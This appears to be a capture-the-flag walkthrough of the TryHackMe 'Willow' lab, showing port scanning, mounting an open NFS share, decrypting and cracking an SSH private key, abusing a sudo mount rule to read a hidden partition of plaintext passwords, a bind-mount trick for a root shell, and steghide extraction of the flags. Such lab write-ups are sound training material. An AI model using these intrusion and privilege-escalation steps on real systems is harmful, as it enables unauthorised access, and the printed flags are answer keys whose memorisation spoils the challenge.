Willow
What lies under the Willow Tree?
Flags
Start Machine
Grab the flags from the Willow
Answer the questions below
┌──(witty㉿kali)-[~/Downloads]
└─$ rustscan -a 10.10.140.120 --ulimit 5500 -b 65535 -- -A -Pn
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy :
: https://github.com/RustScan/RustScan :
--------------------------------------
🌍HACK THE PLANET🌍
[~] The config file is expected to be at "/home/witty/.rustscan.toml"
[~] Automatically increasing ulimit value to 5500.
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
Open 10.10.140.120:22
Open 10.10.140.120:80
Open 10.10.140.120:111
Open 10.10.140.120:2049
[~] Starting Script(s)
[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
[~] Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-22 14:18 EDT
NSE: Loaded 155 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 14:18
Completed NSE at 14:18, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 14:18
Completed NSE at 14:18, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 14:18
Completed NSE at 14:18, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 14:18
Completed Parallel DNS resolution of 1 host. at 14:18, 0.01s elapsed
DNS resolution of 1 IPs took 0.03s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating Connect Scan at 14:18
Scanning 10.10.140.120 [4 ports]
Discovered open port 80/tcp on 10.10.140.120
Discovered open port 111/tcp on 10.10.140.120
Discovered open port 22/tcp on 10.10.140.120
Discovered open port 2049/tcp on 10.10.140.120
Completed Connect Scan at 14:18, 0.19s elapsed (4 total ports)
Initiating Service scan at 14:18
Scanning 4 services on 10.10.140.120
Completed Service scan at 14:18, 6.42s elapsed (4 services on 1 host)
NSE: Script scanning 10.10.140.120.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 14:18
Completed NSE at 14:18, 5.89s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 14:18
Completed NSE at 14:18, 0.81s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 14:18
Completed NSE at 14:18, 0.00s elapsed
Nmap scan report for 10.10.140.120
Host is up, received user-set (0.19s latency).
Scanned at 2023-04-22 14:18:25 EDT for 14s
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 6.7p1 Debian 5 (protocol 2.0)
| ssh-hostkey:
| 1024 43b087cde55409b1c11e7865d9785e1e (DSA)
| ssh-dss AAAAB3NzaC1kc3MAAACBAJHkiuOeIrYxoyBBsJX2wpThJlvbsanlxpYXyHspzVIdeGQq3kD/2h1iNbOLwIb/iwS4oaY83OwxMiXImgKm/QgpgffrrKmU41eI/q9i+3NhLfHLvoT5PWupe/UW5Y3/lfmIMD1UXTUJNYiA07w/kHKj9ElQs7EZ2oZ9L5j2/h/lAAAAFQDE3pT3CTjQSOUOqdgu9HBaB6d6FwAAAIAFWqdfVx3v+GNxecTNp1mDb64WZcf2ssl/j+B6hj5W7s++DTY7Ls/i2R0z5bQes+5rMWYvanYFyWYEj31qWmrLvluJbJKldG3IttW5WfMzIyOJ11MHGAMP2/ZXZ4w3t8dMMudgBPkXE1uGv+p03A1i+Z6UfvGVv4HrtlCwqCRBywAAAIBpf+5ztR5aSDuZPxe/BURQIBKqDhOVZOt+Zhcc1GEcdukmlfmyH0sSm/3ae4CYLqBgD1zzwwSg4IkPR8wb1wa3G5F+OSYymEoKuxYWYN4LlSe9vrIap/1C/NO+jMQ5ru6WYqBcNdPqHQ4r5I7MzhziLdNIhfBmY076aL2Dr/OsAg==
| 2048 c26591c838c9ccc7f9092061e554bdcf (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC0/BxHjpZXU3EhwOMURG/xIJno/fZBBw2tntPhQMsA+L6YoVL4IyTKTz6SGM6BcX9622CGutBiO0pc0vhGlf9v/4cUB7My3d1r3t3EkNF0SaKAmAZLm8QOFbmS/TyHy9wF5TGJLunz5cN3NdGIz3Bz2GHHouicRo/vopYmHxjItfVgVUD2u+e5Gkw7u+U1BxZOrQDlaUS41AJvZm9Pk0pn2hWXeGTCJu8oyCqaEi/u8Wu7Ylp/t15NjEpiDpRp2LH9ctB3EG50LL+ti2o8/U652wIoNhnoF33eI6HJget9jvSC03oOx5r6NqHbOn94kVAUjFbYzK716dBa+I5jocHr
| 256 bf3e4b3d78b67941f47d90635efb2a40 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBIW2cLhyEIs7aEuL5e/SGCx5HsLX1a1GfgE/YBPGXiaFt/AkVFA3leapIvX+CD5wc7wCKGDToBgx6bkIY9vb0T0=
| 256 2cc8874ad8f64cc3038d4c0922836664 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOsXsk2l13dc4bQlT0wYP6/4gpeoTx5IfVvOBF++ClPu
80/tcp open http syn-ack Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: Recovery Page
111/tcp open rpcbind syn-ack 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/tcp6 nfs
| 100003 2,3,4 2049/udp nfs
| 100003 2,3,4 2049/udp6 nfs
| 100005 1,2,3 33137/udp6 mountd
| 100005 1,2,3 40449/tcp mountd
| 100005 1,2,3 43406/udp mountd
| 100005 1,2,3 52430/tcp6 mountd
| 100021 1,3,4 36864/tcp6 nlockmgr
| 100021 1,3,4 36897/tcp nlockmgr
| 100021 1,3,4 37858/udp6 nlockmgr
| 100021 1,3,4 48916/udp nlockmgr
| 100024 1 34484/udp6 status
| 100024 1 36227/tcp status
| 100024 1 37362/udp status
| 100024 1 56246/tcp6 status
| 100227 2,3 2049/tcp nfs_acl
| 100227 2,3 2049/tcp6 nfs_acl
| 100227 2,3 2049/udp nfs_acl
|_ 100227 2,3 2049/udp6 nfs_acl
2049/tcp open nfs_acl syn-ack 2-3 (RPC #100227)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 14:18
Completed NSE at 14:18, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 14:18
Completed NSE at 14:18, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 14:18
Completed NSE at 14:18, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.58 seconds
Hey Willow, here's your SSH Private key -- you know where the decryption key is!
rpcbind is just used to map ports to services this will be how the NFS file server is running
┌──(witty㉿kali)-[~/Downloads]
└─$ showmount -e 10.10.140.120
Export list for 10.10.140.120:
/var/failsafe *
┌──(witty㉿kali)-[~/Downloads]
└─$ sudo mkdir /mnt/willow-failsafe
┌──(witty㉿kali)-[~/Downloads]
└─$ sudo mount 10.10.140.120:/var/failsafe /mnt/willow-failsafe
┌──(witty㉿kali)-[~/Downloads]
└─$ ls -lah /mnt/willow-failsafe
total 12K
drwxr--r-- 2 nobody nogroup 4.0K Jan 30 2020 .
drwxr-xr-x 3 root root 4.0K Apr 22 14:28 ..
-rw-r--r-- 1 root root 62 Jan 30 2020 rsa_keys
┌──(witty㉿kali)-[/mnt/willow-failsafe]
└─$ pwd
/mnt/willow-failsafe
┌──(witty㉿kali)-[/mnt/willow-failsafe]
└─$ ls
rsa_keys
┌──(witty㉿kali)-[/mnt/willow-failsafe]
└─$ cat rsa_keys
Public Key Pair: (23, 37627)
Private Key Pair: (61527, 37627)
rsa_decrypt script (from muirlandoracle)
┌──(witty㉿kali)-[~/Downloads]
└─$ cat rsa_decrypt.py
import argparse
parser = argparse.ArgumentParser(description="Decode RSA")
parser.add_argument("file", help="The file containing the encrypted text")
parser.add_argument("d", help="The Private Key", type=int)
parser.add_argument("n", help="The Modulus", type=int)
args=parser.parse_args()
with open(args.file, "r") as coded:
data = [int(i.strip("\n")) for i in coded.read().split(" ")]
for i in data:
print(chr(i**args.d % args.n), end="")
┌──(witty㉿kali)-[~/Downloads]
└─$ more encoded.txt (from hex)
2367 2367 2367 2367 2367 9709 8600 28638 18410 1735
┌──(witty㉿kali)-[~/Downloads]
└─$ python3 rsa_decrypt.py encoded.txt 61527 37627 > rsakey
┌──(witty㉿kali)-[~/Downloads]
└─$ cat rsakey
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,2E2F405A3529F92188B453CAA6E33270
qUVUQaJ+YmQRqto1knT5nW6m61mhTjJ1/ZBnk4H0O5jObgJoUtOQBU+hqSXzHvcX
wLbqFh2kcSbF9SHn0sVnDQOQ1pox2NnGzt2qmmsjTffh8SGQBsGncDei3EABHcv1
gTtzGjHdn+HzvYxvA6J+TMT+akCxXb2+tfA+DObXVHzYKbGAsSNeLEE2CvVZ2X92
0HBZNEvGjsDEIQtc81d33CYjYM4rhJr0mihpCM/OGT3DSFTgZ2COW+H8TCgyhSOX
SmbK1Upwbjg490TYvlMR+OQXjVJKydWFunPj9LbL/2Ut2DOgmdvboaluXq/xHYM7
q8+Ws506DXAXw3L5r9SToYWzaXiIqaVEO145BlMCSTHXMOb2HowSM/P2EHE727sJ
JJ6ykTKOH+yY2Qit09Yt9Kc/FY/yp9LzgTMCtopGhK+1cmje8Ab5h7BMB7waMUiM
YR891N+B3IIdkHPJSL6+WPtTXw5skposYpPGZSbBNMAw5VNVKyeRZJqfMJhP7iKP
d8kExORkdC2DKu3KWkxhQv3tMpLyCUUhGZBJ/29+1At78jHzMfppf13YL13O/K7K
Uhnf8sLAN51xZdefSDoEC3tGBebahh17VTLnu/21mjE76oONZ9fe/H7Y8Cp6BKh4
GknYUmh4DQ/cqGEFr+GHVNHxQ4kE1TSI/0r4WfekbHJr3+IHeTJVI52PWaCeHSLb
bO/2bSbWENgSJ3joXxxumHr4DSvZqUInqZ9/5/jkkg+DrLsEHoHe3YyVh5QVm6ke
33yhlLOvOI6mSYYNNfQ/8U/1ee+2HjQXojvb57clLuOt6+ElQWnEcFEb74NxgQ+I
DHEvVNHFGY+Z2jvCQoGb0LOV8cvVTSDXtbNQ5f/Z3bMdN3AhMN3tQmqXTAPuOI1T
BXZ1aDS6x+s6ecKjybMV/dvnohG8+dDrssV4DPyTOLntpeBkqpSNeiM4MdhxTHj1
PCkDWfBXEAEA/hfvE1oWXMNguy3vlvKn8Sk9We5fl+tEBvPjPNSWrEHksq4ZJWSz
JMEyWi/AxTnHDFiO+3m0Eovw41tdreBU2S6QbYsa9OOAiBnDmWn2m0YmAwS0636L
NJ0Ay4L+ixfYZ+F/5oVQbhvDoXnQCO58mNYqqlDVtD/21aj1+RtoYxSX2f/jxCXt
AMF890psZEugk+mhRZZ6HCvDewmBWkghrZeREEmuWAFkQWV/3gVdMpSdteWM7YIQ
MxkyUMs4jmwvA4ktznTVN1kK7VAtkIUa8+UuVUfchKpQQjwpbGgfdMrcJe55tOdk
M7mSP/jAl9bXlpyikMhrsdkVyNpFtmJU8EGJ4v5GlQzUDuySBCiwcZ7x6u3hpDG+
/+5Nf8423Dy/iAhSWAjoZD3BdkLnfbji1g4dNrJnqHnoZaZxvxs0qQEi/NcOEm4e
W0pyDdA8so0zkTTd7gm6WFarM7ywGec5rX08gT5v3dDYbPA46LJVprtA+D3ymeR4
l3xMq6RDfzFIFa6MWS8yCK67p7mPxSfqvC5NDMONQ/fz+7fO3/pjKBYZYLuchpk4
TsH6aY4QbgnEMuA+Errb/uf/5MAhWDMqLBhi42kxaXZ1e3ZMz2penCZFf/nofbLc
-----END RSA PRIVATE KEY-----
or using this page :)
https://www.cs.drexel.edu/~jpopyack/Courses/CSP/Fa17/notes/10.1_Cryptography/RSA_Express_EncryptDecrypt_v2.html
Modulus: 37627 , decryption key: 37627 , ciphertext msg (from hex)
┌──(witty㉿kali)-[~/Downloads]
└─$ nano willow_idrsa
┌──(witty㉿kali)-[~/Downloads]
└─$ chmod 600 willow_idrsa
┌──(witty㉿kali)-[~/Downloads]
└─$ cat willow_idrsa
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,2E2F405A3529F92188B453CAA6E33270
qUVUQaJ+YmQRqto1knT5nW6m61mhTjJ1/ZBnk4H0O5jObgJoUtOQBU+hqSXzHvcX
wLbqFh2kcSbF9SHn0sVnDQOQ1pox2NnGzt2qmmsjTffh8SGQBsGncDei3EABHcv1
gTtzGjHdn+HzvYxvA6J+TMT+akCxXb2+tfA+DObXVHzYKbGAsSNeLEE2CvVZ2X92
0HBZNEvGjsDEIQtc81d33CYjYM4rhJr0mihpCM/OGT3DSFTgZ2COW+H8TCgyhSOX
SmbK1Upwbjg490TYvlMR+OQXjVJKydWFunPj9LbL/2Ut2DOgmdvboaluXq/xHYM7
q8+Ws506DXAXw3L5r9SToYWzaXiIqaVEO145BlMCSTHXMOb2HowSM/P2EHE727sJ
JJ6ykTKOH+yY2Qit09Yt9Kc/FY/yp9LzgTMCtopGhK+1cmje8Ab5h7BMB7waMUiM
YR891N+B3IIdkHPJSL6+WPtTXw5skposYpPGZSbBNMAw5VNVKyeRZJqfMJhP7iKP
d8kExORkdC2DKu3KWkxhQv3tMpLyCUUhGZBJ/29+1At78jHzMfppf13YL13O/K7K
Uhnf8sLAN51xZdefSDoEC3tGBebahh17VTLnu/21mjE76oONZ9fe/H7Y8Cp6BKh4
GknYUmh4DQ/cqGEFr+GHVNHxQ4kE1TSI/0r4WfekbHJr3+IHeTJVI52PWaCeHSLb
bO/2bSbWENgSJ3joXxxumHr4DSvZqUInqZ9/5/jkkg+DrLsEHoHe3YyVh5QVm6ke
33yhlLOvOI6mSYYNNfQ/8U/1ee+2HjQXojvb57clLuOt6+ElQWnEcFEb74NxgQ+I
DHEvVNHFGY+Z2jvCQoGb0LOV8cvVTSDXtbNQ5f/Z3bMdN3AhMN3tQmqXTAPuOI1T
BXZ1aDS6x+s6ecKjybMV/dvnohG8+dDrssV4DPyTOLntpeBkqpSNeiM4MdhxTHj1
PCkDWfBXEAEA/hfvE1oWXMNguy3vlvKn8Sk9We5fl+tEBvPjPNSWrEHksq4ZJWSz
JMEyWi/AxTnHDFiO+3m0Eovw41tdreBU2S6QbYsa9OOAiBnDmWn2m0YmAwS0636L
NJ0Ay4L+ixfYZ+F/5oVQbhvDoXnQCO58mNYqqlDVtD/21aj1+RtoYxSX2f/jxCXt
AMF890psZEugk+mhRZZ6HCvDewmBWkghrZeREEmuWAFkQWV/3gVdMpSdteWM7YIQ
MxkyUMs4jmwvA4ktznTVN1kK7VAtkIUa8+UuVUfchKpQQjwpbGgfdMrcJe55tOdk
M7mSP/jAl9bXlpyikMhrsdkVyNpFtmJU8EGJ4v5GlQzUDuySBCiwcZ7x6u3hpDG+
/+5Nf8423Dy/iAhSWAjoZD3BdkLnfbji1g4dNrJnqHnoZaZxvxs0qQEi/NcOEm4e
W0pyDdA8so0zkTTd7gm6WFarM7ywGec5rX08gT5v3dDYbPA46LJVprtA+D3ymeR4
l3xMq6RDfzFIFa6MWS8yCK67p7mPxSfqvC5NDMONQ/fz+7fO3/pjKBYZYLuchpk4
TsH6aY4QbgnEMuA+Errb/uf/5MAhWDMqLBhi42kxaXZ1e3ZMz2penCZFf/nofbLc
-----END RSA PRIVATE KEY-----
──(witty㉿kali)-[~/Downloads]
└─$ ssh -i willow_idrsa willow@10.10.140.120
The authenticity of host '10.10.140.120 (10.10.140.120)' can't be established.
ED25519 key fingerprint is SHA256:magOpLj2XlET5C4pPvsDHoHa4Po1iJpM2eNFkXQUZ2I.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? ye
Please type 'yes', 'no' or the fingerprint: yes
Warning: Permanently added '10.10.140.120' (ED25519) to the list of known hosts.
Enter passphrase for key 'willow_idrsa':
using john
┌──(witty㉿kali)-[~/Downloads]
└─$ ssh2john willow_idrsa > willow_hash.txt
┌──(witty㉿kali)-[~/Downloads]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt willow_hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
wildflower (willow_idrsa)
1g 0:00:00:00 DONE (2023-04-22 14:59) 16.66g/s 168533p/s 168533c/s 168533C/s chulita..simran
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
passphrase: wildflower
┌──(root㉿kali)-[/home/witty/Downloads]
└─# ssh -i id_willow willow@10.10.140.120
Enter passphrase for key 'id_willow':
sign_and_send_pubkey: no mutual signature supported
willow@10.10.140.120's password:
uhmm
https://stackoverflow.com/questions/73795935/sign-and-send-pubkey-no-mutual-signature-supported
┌──(witty㉿kali)-[~/Downloads]
└─$ ssh -o PubkeyAcceptedKeyTypes=ssh-rsa -i id_willow willow@10.10.140.120
Enter passphrase for key 'id_willow':
"O take me in your arms, love
For keen doth the wind blow
O take me in your arms, love
For bitter is my deep woe."
-The Willow Tree, English Folksong
willow@willow-tree:~$ ls
Desktop Documents Downloads Music Pictures Public Templates user.jpg Videos
┌──(witty㉿kali)-[~/Downloads]
└─$ scp -o PubkeyAcceptedKeyTypes=ssh-rsa -i id_willow willow@10.10.140.120:user.jpg .
Enter passphrase for key 'id_willow':
user.jpg 100% 12KB 21.4KB/s 00:00
┌──(witty㉿kali)-[~/Downloads]
└─$ eog user.jpg
THM{beneath_the_weeping_willow_tree}
willow@willow-tree:~$ sudo -l
Matching Defaults entries for willow on willow-tree:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User willow may run the following commands on willow-tree:
(ALL : ALL) NOPASSWD: /bin/mount /dev/*
willow@willow-tree:~$ ls /dev
autofs input rtc tty18 tty35 tty52 ttyS3 vcsa7
block kmsg rtc0 tty19 tty36 tty53 uhid vfio
btrfs-control log shm tty2 tty37 tty54 uinput vga_arbiter
char loop-control snapshot tty20 tty38 tty55 urandom vhci
console mapper snd tty21 tty39 tty56 vcs vhost-net
core mcelog stderr tty22 tty4 tty57 vcs1 vmci
cpu mem stdin tty23 tty40 tty58 vcs2 xconsole
cpu_dma_latency mqueue stdout tty24 tty41 tty59 vcs3 xen
cuse net tty tty25 tty42 tty6 vcs4 xvda
disk network_latency tty0 tty26 tty43 tty60 vcs5 xvda1
dri network_throughput tty1 tty27 tty44 tty61 vcs6 xvda2
fb0 null tty10 tty28 tty45 tty62 vcs7 xvda3
fd port tty11 tty29 tty46 tty63 vcsa xvdh
full ppp tty12 tty3 tty47 tty7 vcsa1 zero
fuse psaux tty13 tty30 tty48 tty8 vcsa2
hidden_backup ptmx tty14 tty31 tty49 tty9 vcsa3
hpet pts tty15 tty32 tty5 ttyS0 vcsa4
hugepages random tty16 tty33 tty50 ttyS1 vcsa5
initctl rfkill tty17 tty34 tty51 ttyS2 vcsa6
willow@willow-tree:~$ ls /mnt
creds
willow@willow-tree:~$ ls /mnt/creds/
willow@willow-tree:~$ sudo /bin/mount /dev/hidden_backup /mnt/creds
willow@willow-tree:~$ cd /mnt/creds/
willow@willow-tree:/mnt/creds$ ls
creds.txt
willow@willow-tree:/mnt/creds$ cat creds.txt
root:7QvbvBTvwPspUK
willow:U0ZZJLGYhNAT2s
willow@willow-tree:/mnt/creds$ su root
Password:
root@willow-tree:/mnt/creds# cd /root
root@willow-tree:~# ls
root.txt
root@willow-tree:~# cat root.txt
This would be too easy, don't you think? I actually gave you the root flag some time ago.
You've got my password now -- go find your flag! (maybe stego)
or
willow@willow-tree:~$ cp /bin/bash /dev/shm/
willow@willow-tree:~$ cd /dev/shm
willow@willow-tree:/dev/shm$ ls
bash pulse-shm-2785350845 pulse-shm-90898252
pulse-shm-1194606719 pulse-shm-90638723
willow@willow-tree:/dev/shm$ sudo /bin/mount /dev/shm/bash /bin/mount -o force,bind
willow@willow-tree:/dev/shm$ echo "bash" > /dev/shm/shell
willow@willow-tree:/dev/shm$ ls
bash pulse-shm-2785350845 pulse-shm-90898252
pulse-shm-1194606719 pulse-shm-90638723 shell
willow@willow-tree:/dev/shm$ sudo /bin/mount /dev/shm/shell
root@willow-tree:/dev/shm# id
uid=0(root) gid=0(root) groups=0(root)
but with this method cannot get creds.txt
┌──(witty㉿kali)-[~/Downloads]
└─$ steghide extract -sf user.jpg
Enter passphrase: 7QvbvBTvwPspUK
wrote extracted data to "root.txt".
┌──(witty㉿kali)-[~/Downloads]
└─$ cat root.txt
THM{find_a_red_rose_on_the_grave}
User Flag:
https://muirlandoracle.co.uk/2020/01/29/rsa-encryption/
THM{beneath_the_weeping_willow_tree}
Root Flag:
Where, on a Linux system, would you first look for unmounted partitions?
THM{find_a_red_rose_on_the_grave}
[[VulnNet Endgame]]
Last updated
